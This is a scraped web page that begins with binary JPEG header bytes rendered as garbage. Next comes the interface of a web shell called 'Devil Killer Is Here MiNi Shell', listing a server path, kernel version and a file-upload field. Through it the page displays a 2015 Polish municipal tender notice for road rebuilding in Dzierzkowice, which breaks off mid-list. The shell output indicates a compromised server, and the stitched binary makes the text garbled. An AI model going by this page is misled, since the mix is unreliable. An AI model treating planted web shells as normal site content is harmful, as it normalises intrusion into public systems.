JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150624/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150624/92731-N-2015.html

<p class="kh_header"><b>Dzierzkowice: Zadanie nr 1
Modernizacja drogi gminnej polegająca na przebudowie drogi na odcinku  długości 0,508 km  w m. Dzierzkowice - Podwody  gm. Dzierzkowice

Zadanie nr 2
Przebudowa nawierzchni drogi gminnej dojazdowej na odcinku 0,203 km w m. Wyżnica Kolonia gm. Dzierzkowice

Zadanie nr 3
Przebudowa nawierzchni drogi gminnej dojazdowej na odcinku 0,212 km w m. Dzierzkowice Rynek gm. Dzierzkowice</b><br>
<b>Numer ogłoszenia: 92731 - 2015; data zamieszczenia: 24.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Dzierzkowice , ul. Terpentynowa 1, 23-251 Dzierzkowice, woj. lubelskie, tel. 081 8221006, faks 081 8221500.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzierzkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie nr 1
Modernizacja drogi gminnej polegająca na przebudowie drogi na odcinku  długości 0,508 km  w m. Dzierzkowice - Podwody  gm. Dzierzkowice

Zadanie nr 2
Przebudowa nawierzchni drogi gminnej dojazdowej na odcinku 0,203 km w m. Wyżnica Kolonia gm. Dzierzkowice

Zadanie nr 3
Przebudowa nawierzchni drogi gminnej dojazdowej na odcinku 0,212 km w m. Dzierzkowice Rynek gm. Dzierzkowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Dla zadania nr 1
1.1 Wykonanie modernizacji ( przebudowy)  drogi  gminnej,  dojazdowej do gruntów rolnych   w m. Dzierzkowice -Podwody  gm. Dzierzkowice,  na odcinku  długości 0,508  km  ( od km 0+000 do km 0+508 wg kilometracji roboczej ) położonym na działce o nr ew. 347 w m. Dzierzkowice - Podwody
W ramach przedmiotu zamówienia dla zadania nr 1 należy wykonać :
Roboty przygotowawcze 
- roboty pomiarowe -polegające na geodezyjnym wytyczeniu pasa drogowego,  na geodezyjnym wytyczeniu trasy drogi , na odcinku  długości  0,508 km
Podbudowa 
- Profilowanie i zagęszczanie podłoża szer.3,20 m wykonywane mechanicznie pod warstwy konstrukcyjne 	nawierzchni na odcinku długości 0,508 km oraz mijance i 3 zjazdach
 - Wyrównanie i wzmocnienie istniejącej nawierzchni warstwą  kruszywa łamanego zagęszczanego mech. o gr. śr 10 	cm po zagęszczeniu na odcinku długości 0,508 km oraz mijance i 3 zjazdach
Roboty nawierzchniowe w technologii betonu asfaltowego
- Wykonanie nawierzchni szer. 3,00 m z betonu asfaltowego na  odcinku długości 0,508 km , szer. 3,00 m na 1 zjeździe długości 10 m  i szer. 3,75 m na 1 mijance,  o konstrukcji :
- warstwa wiążąca  grubości 4 cm z betonu asfaltowego o uziarnieniu 0/11,2 ( AC 11W50/70 )  standard II 
- warstwa ścieralna  grubości 3 cm m z betonu asfaltowego o uziarnieniu 0/11,2 ( AC 11S50/70 )  standard II 
Roboty wykończeniowe 
- utwardzenie obustronnych poboczy szer. 0,25 m  warstwą kruszywa łamanego stabilizowanego mechanicznie grubości 10 cm na odcinku długości 0,508 km , na 1 zjeździe długości 10 m  i na  1 mijance
- utwardzenie zjazdów długości 10,0 m szer.3,0 m (z wyuczeniami)  na drogi boczne warstwą kruszywa łamanego 	stabilizowanego mechanicznie grubości 10 cm 
Dla zadania nr 2
1.2 Wykonanie przebudowy nawierzchni drogi gminnej dojazdowej na odcinku 0,203 km w m. Wyżnica Kolonia gm. Dzierzkowice ( na działce o nr ew. 94 od km 0+000 do km 0+203)
W ramach przedmiotu zamówienia dla zadania nr 2 należy wykonać :
Roboty przygotowawcze
- Roboty pomiarowe przy liniowych robotach ziemnych - odtworzenie pasa drogowego i trasy drogi  w terenie 	płaskim  na odcinku długości 0,203 km 
- Ścinka i profilowania  zawyżonych poboczy gruntowych i środka jezdni wykonywana 	mechanicznie przy grubości 	ścinania  do 10 cm dla odsłonięcia krawędzi i środka istniejącej nawierzchni żwirowej  przy szer. ścinki i 	profilowania: śr 0,3 m. z wywozem uzyskanego humusu na odległość do 3 km na odcinku długości 0,203 km
- Mechaniczne profilowanie i zagęszczanie istniejącej nawierzchni żwirowej  dla przygotowania  podłoża ( ist. 	nawierzchni ) pod warstwy konstrukcyjne wzmocnienia i nawierzchni bitumicznej na szerokości do 2,70 m na 	odcinku długości 0,203 km
 Podbudowa
- Wyrównanie i wzmocnienie istniejącej nawierzchni żwirowej warstwą kruszywa łamanego stabilizowanego 	mechanicznie ( mieszanka sortowana 0/31,5 ) przy średniej grubości 	warstwy po zagęszczeniu 6 cm ,szer. do 	2,60 m na odcinku długości 0,203 km obejmującego włączenie do drogi gminnej . 
 Roboty nawierzchniowe w technologii betonu asfaltowego
- Wykonanie warstwy wyrównawczej z betonu asfaltowego, o uziarnieniu 0/11,2 mm ( AC 11W50/70 ) 	w średniej 	ilości 75 kg na 1 m2, szer.2,50 m na odcinku długości 0,203 km obejmującego włączenie do drogi gminnej 
- Wykonanie nawierzchni ( warstwy ścieralnej) szer. 2,50 m, grubości 3 cm z betonu asfaltowego o uziarnieniu 0/11,2 	mm ( AC 11S50/70 ) na odcinku długości 0,203 km obejmującej włączenie do drogi gminnej 
Roboty wykończeniowe
- Utwardzenie obustronnych poboczy gruntowych warstwą grubości 6 cm,  szer. do 0,3 m z  kruszywa łamanego 	stabilizowanego mechanicznie ( mieszanka sortowana frakcji 0/31,5 mm) na odcinku długości 0,203 km
-  pionowa regulacja obudowy zasuwy przyłącza wodociągowego  
Dla zadania nr 3
1.3 Wykonanie przebudowy  nawierzchni drogi gminnej dojazdowej w m. Dzierzkowice - Rynek  na odcinku 0,212  km  ( na działce o nr ew. 88/1 od km 0+000 do km 0+212)
W ramach przedmiotu zamówienia dla zadania nr 3 należy wykonać :
Roboty przygotowawcze
- Roboty pomiarowe przy liniowych robotach ziemnych - odtworzenie pasa drogowego i trasy drogi  w terenie 	płaskim  na odcinku długości 0,212 km 
- Ścinka i profilowania  zawyżonych poboczy gruntowych i środka jezdni wykonywana 	mechanicznie przy grubości 	ścinania  do 10 cm dla odsłonięcia krawędzi istniejącej nawierzchni żwirowej  przy szer. ścinki i profilowania: śr 	0,3 m. z wywozem uzyskanego humusu na odległość do 1 km , na odcinku długości 0,212 km
- Mechaniczne profilowanie i zagęszczanie istniejącej nawierzchni żwirowej  dla przygotowania  podłoża ( ist. 	nawierzchni ) pod warstwy konstrukcyjne wzmocnienia i nawierzchni bitumicznej na szerokości do 2,60 m na 	odcinku długości 0,212 km oraz poszerzeniu na łuku
 Podbudowa
- Wyrównanie i wzmocnienie istniejącej nawierzchni żwirowej warstwą kruszywa łamanego stabilizowanego 	mechanicznie ( mieszanka sortowana 0/31,5 ) przy średniej grubości warstwy po zagęszczeniu 6 cm , szer. śr. 2,60 	m na odcinku  długości 0,212 km oraz na poszerzeniu na łuku i poszerzeniu przed bramą wjazdową
Roboty nawierzchniowe w technologii betonu asfaltowego
- Wykonanie warstwy wyrównawczej szer. 2,50 m z betonu asfaltowego, o uziarnieniu 0/11,2 mm ( AC 11W50/70 ) 	w średniej ilości 75 kg na 1 m2,  na odcinku długości 0,212 km oraz na poszerzeniu na łuku i poszerzeniu przed 	bramą wjazdową
- Wykonanie nawierzchni szer. 2,50 m ( warstwy ścieralnej) grubości 3 cm m z betonu asfaltowego o uziarnieniu 	0/11,2 mm ( AC 11S50/70 ) na odcinku długości 0,212 km oraz na poszerzeniu na łuku i poszerzeniu przed bramą 	wjazdową
 Roboty wykończeniowe
- Utwardzenie obustronnych poboczy gruntowych warstwą grubości 6 cm,  szer. do 0,3 m z kruszywa łamanego 	stabilizowanego mechanicznie ( mieszanka sortowana frakcji 0/31,5 mm) na odcinku długości 0,212 km
2.  Podstawę wyceny i wykonania przedmiotu zamówienia stanowią:
2.1 Uproszczona dok.  tech.- zał. do SiWZ  nr 9/1 - zadanie nr 1 , nr 9/2 - zadanie nr 2, nr 9/3 - zadanie nr 3, w 	której skład wchodzi:
 - Opis techniczny robót 
 - Specyfikacja  techniczna wykonania i odbioru robót 
 - Przedmiary robót (jako  element pomocniczy) 
2.2  Specyfikacja istotnych warunków zamówienia, wizja w terenie;
3. Zaleca się, aby Wykonawca dokonał wizji lokalnej, gdzie będą realizowane roboty będące przedmiotem  zamówienia oraz zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty i podpisania umowy.
4. Realizacja przedmiotu zamówienia winna być wykonana w oparciu o obowiązujące przepisy, a w  szczególności ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jedn. Dz. U. z 2013 r., poz. 1409 za zm.) wraz z przepisami wykonawczymi, przez Wykonawcę posiadającego stosowne doświadczenie i potencjał wykonawczy określony w SIWZ oraz przez osoby posiadające odpowiednie kwalifikacje i doświadczenie.
5. Materiały użyte przez Wykonawcę powinny odpowiadać, co do jakości, wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie, określonym w art. 10 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jedn. Dz. U. z 2013r., poz. 1409 ze zm.).
6. Wykonanie przedmiotu zamówienia i oddanie do użytku musi być również zgodne ze wszystkimi aktami prawnymi właściwymi dla przedmiotu zamówienia, z przepisami techniczno-budowlanymi, obowiązującymi polskimi normami, wytycznymi oraz zasadami wiedzy technicznej.
7.	Jeżeli dokumentacja projektowa lub specyfikacja techniczna wykonania i odbioru robót budowlanych wskazywałaby w odniesieniu do niektórych materiałów lub urządzeń znaki towarowe, patenty lub pochodzenie - zamawiający, zgodnie z art. 29 ust. 3 ustawy Pzp, dopuszcza oferowanie materiałów lub urządzeń równoważnych. Materiały lub urządzenia pochodzące od konkretnych producentów określają minimalne parametry jakościowe cechy użytkowe, jakim muszą odpowiadać materiały lub urządzenia oferowane przez wykonawcę, aby zostały spełnione wymagania stawiane przez zamawiającego. Materiały lub urządzenia lub urządzenia pochodzące od konkretnych producentów stanowią wyłącznie wzorzec jakościowy przedmiotu zamówienia. Pod pojęciem - minimalne parametry jakościowe i cechy użytkowe - zamawiający rozumie wymagania dotyczące materiałów lub urządzeń zawarte w ogólnie dostępnych źródłach, katalogach, stronach internetowych producentów. Operowanie przykładowymi nazwami producenta ma jedynie na celu doprecyzowanie poziomu oczekiwań zamawiającego w stosunku do określonego rozwiązania. Posługiwanie się nazwami producentów/produktów ma wyłącznie charakter przykładowy. Zamawiający, wskazując oznaczenie konkretnego producenta (dostawcy) lub konkretny produkt przy opisie przedmiotu zamówienia, dopuszcza jednocześnie produkty równoważne o parametrach jakościowych i cechach użytkowych co najmniej na poziomie parametrów wskazanego produktu, uznając tym samym każdy produkt o wskazanych lub lepszych parametrach. W takiej sytuacji zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających te materiały lub urządzenia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od obowiązku wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje   warunku. 
W celu wykazania spełnienia przez Wykonawcę warunku. Zamawiający żąda załączenia do oferty oświadczenia,   Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - ( wg wzoru stanowiącego  załącznik nr 2 do  specyfikacji) 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie   wymaganego oświadczenia, według formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje   warunku. 
W celu wykazania spełnienia przez Wykonawcę warunku. Zamawiający żąda załączenia do oferty oświadczenia,   Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - ( wg wzoru stanowiącego  załącznik nr 2 do  specyfikacji) 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie   wymaganego oświadczenia, według formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje  warunku , oprócz złożenia  oświadczenia o  spełnieniu warunków  udziału w postępowaniu o  zamówienie   publiczne 	zgodnie z art. 22  ust. 1 ustawy Pzp  ( wg wzoru  stanowiącego  załącznik nr 2 do  specyfikacji) 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie   wymaganego oświadczenia, według formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający precyzuje warunek
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje co najmniej  1 osobą  posiadającą uprawnienia budowlane do kierowania  robotami budowlanymi   w specjalności drogowej posiadającą  co  najmniej 5 letnie doświadczenie  w  pełnieniu funkcji   kierownika  budowy 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie   wymaganych oświadczeń i dokumentów, według formuły: spełnia/nie spełnia. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art. 23 ustawy,  określony warunek jest spełniony, gdy podmioty składające wspólną ofertę spełniają je łącznie
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie   wymaganego oświadczenia, według formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku.
W celu wykazania spełnienia przez Wykonawcę warunku. Zamawiający żąda załączenia do oferty oświadczenia,   Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - ( wg wzoru stanowiącego  załącznik nr 2 do  specyfikacji) 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie   wymaganego oświadczenia, według formuły: spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-Wypełniony formularz oferty , podpisany przez upełnomocnionych przedstawicieli wg określonego wzoru stanowiącego załącznik nr 1 do SiWZ ( jeżeli prawo do podpisywania oferty nie wynika z dołączonych dokumentów, należy dołączyć pełnomocnictwo do podpisania oferty )2)  pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na 	okres korzystania z nich przy wykonaniu zamówienia - w przypadku nie dysponowania takimi zasobami przez 	Wykonawcę,  zgodnie ze wzorem stanowiącym załącznik nr 5a  do SIWZ ( jeżeli wykonawca, wskazując 	spełnienie warunków o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych 	podmiotów 	na 	zasadach określonych w art. 26 ust. 2b ustawy, zamawiający, w celu oceny, czy wykonawca będzie 	dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania 	zamówienia oraz 	oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów 	żąda dokumentów dotyczących w szczególności:
	a) zakresu dostępnych zasobów innego podmiotu 
	b) sposobu korzystania  zasobów innego podmiotu, przez wykonawcę, przy wykonaniu 	zamówienia;
	c) charakteru stosunku,  jaki będzie łączył wykonawcę z innym podmiotem;
	d) zakresu  i okresu udziału innego  podmiotu przy wykonaniu zamówienia
Kosztorysy ofertowe  na poszczególne zdania sporzadzone wg załaczonych przedmiarów robót</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 94</li>
<li>2 - Okres gwarancji - 6</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego znajdują się w projekcie umowy (załącznik nr 8 do SIWZ).
Zmiana postanowień umowy
1. 	Zgodnie z art. 144 ust. 1 ustawy, Zamawiający dopuszcza możliwość dokonywania nieistotnych zmian zawartej umowy w stosunku w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy. 
2. 	Zamawiający przewiduje również następujące możliwości dokonania istotnej zmiany zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
1)	 zmiana zakresu zamówienia spowodowana zmianą dokumentacji technicznej, skorygowanej przez projektanta i zaakceptowanej przez Zamawiającego, 
